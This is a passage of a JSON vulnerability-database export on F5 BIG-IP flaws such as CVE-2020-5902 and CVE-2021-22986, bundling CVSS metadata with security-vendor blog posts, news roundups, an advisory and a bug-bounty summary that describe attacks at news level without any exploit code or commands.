The Burp Collaborator is a network service that Burp Suite uses when testing web applications for security vulnerabilities.\n\nThese attacks were detected as a new zero-day attack by [Imperva WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) generic security controls. Imperva\u2019s research team has also added new dedicated rules to mitigate these vulnerabilities to block these attacks so Imperva WAF customers are protected Out-Of-the-Box.\n\nThe post [Attacks Spike Following The Disclosure Of CVE-2021-22986: F5 Networks BIG-IP iControl Remote Command Execution Vulnerability](<https://www.imperva.com/blog/attacks-spike-following-the-disclosure-of-cve-2021-22986-f5-networks-big-ip-icontrol-remote-command-execution-vulnerability/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T19:45:18", "type": "impervablog", "title": "Attacks Spike Following The Disclosure Of CVE-2021-22986: F5 Networks BIG-IP iControl Remote Command Execution Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-22986"], "modified": "2021-03-22T19:45:18", "id": "IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F", "href": "https://www.imperva.com/blog/attacks-spike-following-the-disclosure-of-cve-2021-22986-f5-networks-big-ip-icontrol-remote-command-execution-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T14:27:01", "description": "Imperva\u2019s report, [**The State of Vulnerabilities in 2020**](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>) has revealed that unlike in previous years, researchers observed a fall in the number of vulnerabilities last year, even as businesses were compelled to accelerate digital transformation processes due to the COVID-19 pandemic. Vulnerabilities are defined as the gaps or weaknesses that undermine an organization\u2019s IT security efforts, such as a firewall flaw that enables hackers into a network.\n\nThe overall number of new vulnerabilities in 2020 (23,006) was down by 2.04% compared to 2019 (23,485) and by 0.86% compared to 2018 (23,207).\n\nAccording to the report, the dominant root cause of vulnerabilities was [cross-site scripting](<https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/>) (XSS) with injection as the second-most dominant root cause. Drilling down into the report data, the researchers note that a large percentage of this appeared to be related to [SQL injection](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>). While XSS was the dominant root cause of vulnerabilities, most of the attacks in 2020 were related to injection vulnerabilities rather than XSS. Only 15.68% of the attacks that Imperva registered were related to XSS. On the contrary, the injection vulnerability category appeared to be the attackers\u2019 \u201cfavorite\u201d with 44.75% of all attacks. 
After injection vulnerability, path traversal and local file include (LFI) attacks were the attackers\u2019 second \u201cfavorite\u201d with 24.83%.\n\nSocial media, in fact, echoed this finding with 75% of the top 20 most viral tweets being related to the leading attack category, injection and remote code execution. Researchers observed a high correlation between the chatter in social media and actual attacks. Analyzing tweets from Twitter, the two most trending vulnerabilities on social media belonged to CVE-2020-5902 and CVE-2020-3452 which were also the top vulnerabilities used by hackers in 2020.\n\nImperva researchers continued to see a constant growth of vulnerabilities in APIs (Application Programming Interfaces) in 2020, with WordPress the most popular platform in the content management system category. In the server side technologies category, the report indicates an increase in the number of vulnerabilities in applications or packages written in JavaScript for NodeJS.\n\nThe report also shows MySQL to be ahead of all other popular databases in terms of new vulnerabilities discovered in 2020, although 92.4% of these had an unknown exploit. This is likely because Oracle acquired MySQL and doesn\u2019t usually share technical details in its security reports. Additional analysis of bug bounty vulnerabilities revealed that almost 40% of them were ranked as Critical.\n\n### Vulnerabilities and cyber security attacks forecast for 2021\n\nGiven the degree to which APIs have become a necessary element for applications, Imperva researchers expect to see constant growth in the number of API vulnerabilities, although the rate of this growth is likely to decrease in 2021. 
The release of the OWASP API Security - Top 10 which standardizes the main threats in APIs will increase the awareness of security among developers and play a role in decreasing vulnerabilities.\n\nOld faithful injection and XSS vulnerabilities will remain a serious concern, despite greater awareness and the number of tools that check code for their presence. The reason for this is the direct impact of the exploitation of these vulnerabilities, as well as - in most cases - the lack of preconditions required to exploit them. Injection vulnerabilities may also lead to [supply chain attacks](<https://www.imperva.com/learn/application-security/supply-chain-attack/>) resulting in [PII](<https://www.imperva.com/learn/data-security/personally-identifiable-information-pii/>) data theft.\n\nThe number of vulnerabilities in third-parties will continue to grow, as major platforms and frameworks become more reliant on third-party plugins. These vulnerabilities may be the gateway to various supply chain attacks. WordPress has over 58,000 plugins, the NPM registry has almost 1.5 million packages for NodeJS, and PyPI has over 280,000 packages for Python. In addition, there are also main package registries for Java and Ruby-based projects. As the community continues to grow, and without code standards or restrictions to publish a plugin or a package, they remain the weakest point in an application, making them the sweet spot for attackers.\n\nDownload the full report [here](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>).\n\n### Protect your apps from attack with a Web Application Firewall (WAF)\n\nOne of the best solutions for protecting against web application database vulnerabilities is to deploy a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Data Monitoring & Protection. 
The solution may be either on-premise, in the cloud, or a combination of both depending on your needs, infrastructure, and more. Start a [free trial](<https://www.imperva.com/free-trial/>) today.\n\nThe post [Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T19:42:10", "type": "impervablog", "title": "Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-02-22T19:42:10", "id": "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "href": "https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T16:14:43", "description": "", 
"cvss3": {}, "published": "2021-03-12T00:00:00", "type": "seebug", "title": "F5 Networks \u591a\u4e2a\u6f0f\u6d1e\uff08CVE-2021-22986\u3001CVE-2021-22987\u3001CVE-2021-22988\u3001CVE-2021-22989\u3001CVE-2021-22990\u3001CVE-2021-22991\u3001CVE-2021-22992\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-12T00:00:00", "id": "SSV:99156", "href": "https://www.seebug.org/vuldb/ssvid-99156", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2020-08-07T08:03:49", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion. Also, learn about how the Vermont Department of Taxes may have been exposing taxpayer data for more than three years.\n\nRead on:\n\n[**Ransomware is Still a Blight on Business**](<https://blog.trendmicro.com/ransomware-is-still-a-blight-on-business/>)\n\n_Ransomware has been with us for years, but only really became mainstream after the global WannaCry and NotPetya incidents of 2017. Now mainly targeting organizations in lieu of consumers, and with increasingly sophisticated tools and tactics, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. 
That\u2019s why we need industry partnerships like No More Ransom._\n\n[**Garmin Outage Caused by Confirmed WastedLocker Ransomware Attack**](<https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/>)\n\n_Wearable device maker Garmin shut down some of its connected services and call centers last week following what the company called a worldwide outage, now confirmed to be caused by a WastedLocker ransomware attack._ _Garmin's product line includes GPS navigation and wearable technology for the automotive, marine, aviation, marine, fitness, and outdoor markets._\n\n[**Trend Micro Launches Cloud Solution for Microsoft Azure**](<https://datacenternews.us/story/trend-micro-launches-cloud-solution-for-microsoft-azure>)\n\n_Trend Micro announced the availability of its Trend Micro Cloud One \u2013 Conformity offering to Azure customers, helping global organizations tackle misconfigurations, compliance challenges and cyber-risks in the cloud. The company also achieved the CIS Microsoft Azure Foundation Security Benchmark, certifying that the Conformity product has built-in rules to check for more than 100 best practices in the CIS framework._\n\n[**Ensiko: A Webshell with Ransomware Capabilities**](<https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/>)\n\n_Ensiko is a PHP web shell with ransomware capabilities that targets platforms such as Linux, Windows, macOS, or any other platform that has PHP installed. The malware has the capability to remotely control the system and accept commands to perform malicious activities on the infected machine. 
It can also execute shell commands on an infected system and send the results back to the attacker via a PHP reverse shell._\n\n[**\u2018Boothole\u2019 Threatens Billions of Linux, Windows Devices**](<https://www.scmagazine.com/home/security-news/boothole-threatens-billions-of-linux-windows-devices/>)\n\n_A newly discovered serious vulnerability \u2013 dubbed \u201cBootHole\u201d \u2013 with a CVSS rating of 8.2 could unleash attacks that could gain total control of billions of Linux and Windows devices. Security firm Eclypsium researchers released details this week about how the flaw can take over nearly any device\u2019s boot process._\n\n[**Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902**](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/>)\n\n_Following the initial disclosure of two F5 BIG-IP vulnerabilities in early July, Trend Micro continued monitoring and analyzing the vulnerabilities and other related activities to further understand their severities. Based on the workaround published for CVE-2020-5902, Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload._\n\n[**Hackers Stole GitHub and GitLab OAuth Tokens from Git Analytics Firm Waydev**](<https://www.zdnet.com/article/hackers-stole-github-and-gitlab-oauth-tokens-from-git-analytics-firm-waydev/#ftag=RSSbaffb68>)\n\n_Waydev, a San Francisco-based company, runs a platform that can be used to track software engineers' work output by analyzing Git-based codebases. 
Earlier this month, the company disclosed a security breach, saying that hackers broke into its platform and stole GitHub and GitLab OAuth tokens from its internal database._\n\n[**Application Security 101**](<https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/application-security-101>)\n\n_As the world currently grapples with the disruption brought about by the coronavirus pandemic, the need for digital transformation has become not only more apparent but also more urgent. Applications now play an integral role, with many businesses and users relying on a wide range of applications for work, education, entertainment, retail, and other uses._\n\n[**Vermont Taxpayers Warned of Data Leak Over the Past Three Years**](<https://threatpost.com/vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/157856/>)\n\n_The Vermont Department of Taxes may have been exposing taxpayer data that could be used in credential scams for more than three years due to a vulnerability in its online tax filing system. A notice posted on the department\u2019s website warned taxpayers who filed a Property Transfer Tax return through the department\u2019s online filing site between Feb. 1, 2017, and July 2, 2020, may have had their personal information leaked._\n\n[**Guidelines Related to Security in Smart Factories Part 6: MITRE ATT&CK**](<https://www.trendmicro.com/us/iot-security/news/6036/Guidelines_Related_to_Security_in_Smart_Factories_Part_6_MITRE_ATT_CK>)\n\n_This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Thus far, part one through part five have explained IEC62443, the NIST CSF, part of the P800 series, and CIS Controls. 
In part six, Trend Micro explains MITRE ATT&CK, although not a guideline, it is a knowledge base in which offensive and defensive technologies in cyber-attacks are clearly organized._\n\n[**If You Own One of These 45 Netgear Devices, Replace It: Firm Won't Patch Vulnerable Gear Despite Live Proof-of-Concept Code**](<https://www.theregister.com/2020/07/30/netgear_abandons_45_routers_vuln_patching/>)\n\n_Netgear has decided not to patch more than 40 home routers to plug a remote code execution vulnerability \u2013 despite security researchers having published proof-of-concept exploit code. The vulnerability was revealed publicly in June by Trend Micro's Zero Day Initiative (ZDI)._\n\n[**Online Dating Websites Lure Japanese Customers to Scams**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/online-dating-websites-lure-japanese-customers-to-scams>)\n\n_In May, Trend Micro observed a sudden increase in traffic for online dating websites primarily targeting Japanese customers. After analyzing and tracking these numbers, we found that these dating scam campaigns attract potential victims by using different website domains that have similar screen page layouts. By the end of the transactions, the fraudsters steal money from victims without the subscribers receiving any of the advertised results._\n\n[**ESG Findings on Trend Micro Cloud-Powered XDR Drives Monumental Business Value**](<https://blog.trendmicro.com/esg-findings-xdr/>)\n\n_Trend Micro\u2019s cloud-powered XDR and Managed XDR offerings optimize threat detection and response across all critical vectors. In a recent survey commissioned by Trend Micro and conducted by ESG, organizations surveyed experience faster detection and less alert fatigue as a result of intelligently using data from all their security controls (including those covering endpoints, email, servers, cloud workloads and networks)._\n\nHow does your organization manage threat detection and response? 
Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years](<https://blog.trendmicro.com/this-week-in-security-news-mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902-and-vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-07-31T12:30:21", "type": "trendmicroblog", "title": "This Week in Security News: Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902 and Vermont Taxpayers Warned of Data Leak Over the Past Three Years", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-31T12:30:21", "id": "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "href": "https://blog.trendmicro.com/this-week-in-security-news-mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902-and-vermont-taxpayers-warned-of-data-leak-over-the-past-three-years/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-10T15:54:49", "description": "\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums. Also, learn about a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173.\n\nRead on:\n\n[**Cloud Security is Simple, Absolutely Simple.**](<https://blog.trendmicro.com/cloud-security-is-simple/>)\n\n_\u201cCloud security is simple, absolutely simple. 
Stop over complicating it.\u201d This is the advice that Mark Nunnikhoven, vice president of cloud research at Trend Micro, shared to kick off his presentation at the CyberRisk Alliance Cloud Security Summit this year. Check out a recording of his talk in this blog recap to learn more._\n\n[**Order Out of Chaos: Tackling Phishing Attacks**](<https://securityboulevard.com/2020/07/order-out-of-chaos-tackling-phishing-attacks/>)\n\n_Responding to phishing attacks requires a combination of commodity tools, cutting-edge machine learning techniques and human-powered defense. That\u2019s how to create order out of chaos and beat the phishers at their own game, according to Trend Micro\u2019s Greg Young. Learn more in his recent article on phishing in Security Boulevard. _\n\n[**Beyond the Endpoint: Why Organizations are Choosing XDR for Holistic Detection and Response**](<https://blog.trendmicro.com/beyond-the-endpoint-why-organizations-are-choosing-xdr-for-holistic-detection-and-response/>)\n\n_The endpoint has long been a major focal point for attackers targeting enterprise IT environments. Yet increasingly, security teams are needing to protect data across the organization - whether it\u2019s in the cloud, on IoT devices, in email, or on-premises servers - attackers may jump from one environment to the next in multi-stage attacks and even hide between the layers. XDR solutions offer a convincing alternative to EDR and point solutions._\n\n[**15 Billion Credentials Currently Up for Grabs on Hacker Forums**](<https://threatpost.com/15-billion-credentials-currently-up-for-grabs-on-hacker-forums/157247/>)\n\n_Fifteen billion usernames and passwords for a range of internet services are currently for sale on underground forums. 
A report released from the Digital Shadows Photon Research Team found that 100,000 separate data breaches over a 2-year period have yielded a 300% increase in stolen credentials, leaving a wealth of account details on dark-web hacker forums up for grabs._\n\n[**ISO/SAE 21434: It\u2019s Time to Put the Brakes on Connected Car Cyber-Threats**](<https://blog.trendmicro.com/iso-sae-21434-its-time-to-put-the-brakes-on-connected-car-cyber-threats/>)\n\n_Connected cars are set to grow 270% by 2022 to reach an estimated 125 million in just a few years. However, the high-performance mobile computers in connected cars can also leave them exposed to sensitive data theft and remote manipulation, which could create serious physical safety issues. This is where the ISO/SAE 21434 standard comes in and creates detailed guidance for the automotive industry to help it navigate these challenges and reduce reputational and cyber-risk._\n\n[**New Mirai Variant Expands Arsenal, Exploits CVE-2020-10173**](<https://blog.trendmicro.com/trendlabs-security-intelligence/new-mirai-variant-expands-arsenal-exploits-cve-2020-10173/>)\n\n_Trend Micro discovered a new Mirai variant that exploits nine vulnerabilities, most notable of which is CVE-2020-10173 in Comtrend VR-3033 routers which were not observed as exploited by past Mirai variants. This discovery is a new addition to the Mirai variants that appeared in the past few months which include SORA, UNSTABLE, and Mukashi. _\n\n[**Microsoft Files Lawsuit to Seize Fake Domains Used in COVID-19-Themed BEC Attacks**](<https://www.securityweek.com/microsoft-files-lawsuit-seize-fake-domains-used-covid-19-themed-bec-attacks?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+Securityweek+%28SecurityWeek+RSS+Feed%29>)\n\n_Microsoft has filed a lawsuit in an effort to seize control of several domains used to launch COVID-19-themed cyberattacks against the company\u2019s customers in 62 countries. 
The company started tracking the malicious activity in December 2019 after identifying it as a phishing scheme attempting to compromise Microsoft customer accounts and access emails, contacts, sensitive files, and other information._\n\n[**Cleaner One Pro Speeds Up Your Mac: Part 1**](<https://blog.trendmicro.com/cleaner-one-pro-speeds-up-your-mac-part-1/>)\n\n_Trend Micro Cleaner One Pro is an easy-to-use, all-in-one disk cleaning and optimization utility that can help you boost your Mac\u2019s performance. In this two-part blog series, Trend Micro outlines how you can use Cleaner One Pro to make your Mac run faster, walking you through its features. In Part 1, Trend Micro focuses on Quick Optimizer, the Main Console, and the Cleaning Tools. _\n\n[**Joker Malware Apps Once Again Bypass Google's Security to Spread via Play Store**](<https://thehackernews.com/2020/07/joker-android-mobile-virus.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+TheHackersNews+%28The+Hackers+News+-+Cyber+Security+Blog%29>)\n\n_Cybersecurity researchers unveiled another instance of Android malware hidden under the guise of legitimate applications to stealthily subscribe unsuspecting users for premium services without their knowledge. The Joker malware has found another trick to bypass Google's Play Store protections: obfuscate the malicious DEX executable inside the application as Base64 encoded strings, which are then decoded and loaded on the compromised device._\n\n[**Malicious Chrome Extensions, Domains Used to Steal User Data**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/chrome-extensions-malicious-domains-used-to-steal-user-data>)\n\n_Google Chrome extensions and Communigal Communication Ltd. (Galcomm) domains were used in a campaign that aims to track user activity and data, according to Awake Security. 
In the past three months, the researchers found 111 malicious or fake Chrome extensions using Galcomm domains as their command and control infrastructure. There have been at least 32 million downloads of these malicious extensions._\n\n[**Patch Now: F5 Vulnerability with CVSS 10 Severity Score**](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/patch-now-f5-vulnerability-with-cvss-10-severity-score>)\n\n_F5 Networks, a provider of networking devices and services, urges users to patch their BIG-IP networking systems as soon as possible after disclosing two vulnerabilities: CVE-2020-5902, a critical remote code execution (RCE) vulnerability found in BIG-IP device\u2019s Traffic Management User Interface (TMUI), and_ _CVE-2020-5903, a less critical vulnerability that involves cross-site scripting (XSS). F5 has now released patches for both in the vulnerabilities\u2019 respective security advisories._\n\n[**Ransomware Report: Avaddon and New Techniques Emerge, Industrial Sector Targeted**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted>)\n\n_Over the past couple of months, ransomware has remained a formidable threat as new families, techniques, and targets continue emerging at every turn. Trend Micro recently witnessed the rise of a new ransomware family called Avaddon. In this blog, Trend Micro examines techniques utilized by some ransomware variants and the industries affected by these attacks. 
_\n\n[**70% of Organizations Experienced a Public Cloud Security Incident in the Last Year**](<https://www.helpnetsecurity.com/2020/07/09/public-cloud-security-incident/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HelpNetSecurity+%28Help+Net+Security%29>)\n\n_70% of organizations experienced a public cloud security incident in the last year \u2013 including ransomware and other malware (50%), exposed data (29%), compromised accounts (25%), and cryptojacking (17%), according to Sophos._ _Organizations running multi-cloud environments are greater than 50% more likely to suffer a cloud security incident than those running a single cloud._\n\n[**Russian Group Cosmic Lynx Launches Over 200 BEC Campaigns**](<https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/russian-group-cosmic-lynx-launches-over-200-bec-campaigns>)\n\n_A Russian group dubbed as Cosmic Lynx initiated more than 200 Business Email Compromise (BEC) campaigns targeting hundreds of multinational companies, according to security firm Agari. Cosmic Lynx was revealed to have been launching campaigns in over 40 countries including the United States, Canada, and Australia since 2019. The average amount requested from the targets is at US $1.27 million._\n\n[**Guidelines Related to Security in Smart Factories Part 3: NIST Cyber Security Framework**](<https://www.trendmicro.com/us/iot-security/news/5979/Guidelines_Related_to_Security_in_Smart_Factories_Part_3_NIST_Cyber_Security_Framework>)\n\n_This blog series explains examples of general-purpose guidelines for ICS and OT security and helps readers understand the concepts required for security in smart factories. Part three dives into the NIST Cyber Security Framework (CSF), which is issued by US National Institute of Standards and Technology (NIST). _\n\nHas your organization experienced a public cloud security incident over the last year? 
Share your thoughts in the comments below or follow me on Twitter to continue the conversation: [@JonLClay.](<https://twitter.com/jonlclay>)\n\nThe post [This Week in Security News: 15 Billion Credentials Currently Up for Grabs on Hacker Forums and New Mirai Variant Expands Arsenal](<https://blog.trendmicro.com/this-week-in-security-news-15-billion-credentials-currently-up-for-grabs-on-hacker-forums-and-new-mirai-variant-expands-arsenal/>) appeared first on [](<https://blog.trendmicro.com>).", "cvss3": {}, "published": "2020-07-10T12:30:22", "type": "trendmicroblog", "title": "This Week in Security News: 15 Billion Credentials Currently Up for Grabs on Hacker Forums and New Mirai Variant Expands Arsenal", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-10173", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-10T12:30:22", "id": "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "href": "https://blog.trendmicro.com/this-week-in-security-news-15-billion-credentials-currently-up-for-grabs-on-hacker-forums-and-new-mirai-variant-expands-arsenal/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ptsecurity": [{"lastseen": "2021-10-22T10:43:24", "description": "# PT-2020-04: Arbitrary code execution in F5 Traffic Management User Interface (TMUI)\n\nF5 Traffic Management User Interface (TMUI)\n\n**Severity:**\n\nSeverity level: High \nImpact: Arbitrary code execution in F5 Traffic Management User Interface (TMUI) \nAccess Vector: Remote\n\nCVSS v3.1: Base 10 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\nCVE: CVE-2020-5902\n\n**Vulnerability description:**\n\nThe vulnerability allows unauthorized remote attackers to execute malicious code on the system, obtain sensitive information, or hijack traffic, as well as use the server with the Traffic Management User Interface (TMUI) for attacks on other internal resources of the target organization.\n\n**Advisory status:**\n\n01.04.2020 - Vendor notification date \n01.07.2020 - Security 
advisory publication date (<https://support.f5.com/csp/article/K52145254>) \n\n**Credits:**\n\nThe vulnerability was discovered by Mikhail Klyuchnikov, Positive Technologies\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-04T00:00:00", "type": "ptsecurity", "title": "PT-2020-04: Arbitrary code execution in F5 Traffic Management User Interface (TMUI)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2020-01-07T00:00:00", "id": "PT-2020-04", "href": "https://www.ptsecurity.com/ww-en/analytics/threatscape/pt-2020-04/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hackerone": [{"lastseen": "2022-03-25T13:54:30", "bounty": 0.0, "description": "@remonsec reported to us a vulnerability in F5 BIG-IP's Traffic Management User Interface (TMUI), which exploited, could have led to RCE (in undisclosed pages): [CVE-2020-5902](https://support.f5.com/csp/article/K52145254)\nWe swiftly applied the fix to the F5 BIG-IP & restricted access further, which resolved the issue.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 
"confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-23T13:50:18", "type": "hackerone", "title": "8x8: F5 BIG-IP TMUI RCE - CVE-2020-5902 (\u2588\u2588.packet8.net)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-5902"], "modified": "2022-03-25T11:11:39", "id": "H1:1519841", "href": "https://hackerone.com/reports/1519841", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2021-02-11T17:15:02", "description": "One year ago, we reported the steady increase in the use of web shells in attacks worldwide. The latest Microsoft 365 Defender data shows that this trend not only continued, it accelerated: every month from August 2020 to January 2021, we registered an average of 140,000 encounters of these threats on servers, almost double the 77,000 monthly average we [saw last year](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>).\n\n\n\n_Figure 1. Web shell encounters on servers_\n\nThe escalating prevalence of web shells may be attributed to how simple and effective they can be for attackers. 
A web shell is typically a small piece of malicious code written in typical web development programming languages (e.g., ASP, PHP, JSP) that attackers implant on web servers to provide remote access and code execution to server functions. Web shells allow attackers to run commands on servers to steal data or use the server as launch pad for other activities like credential theft, lateral movement, deployment of additional payloads, or hands-on-keyboard activity, while allowing attackers to persist in an affected organization.\n\nAs web shells are increasingly more common in attacks, both commodity and targeted, we continue to monitor and investigate this trend to ensure customers are protected. In this blog, we will discuss challenges in detecting web shells, and the Microsoft technologies and investigation tools available today that organizations can use to defend against these threats. We will also share guidance for hardening networks against web shell attacks.\n\n## Web shells as entry point for attacks\n\nAttackers install web shells on servers by taking advantage of security gaps, typically vulnerabilities in web applications, in internet-facing servers. These 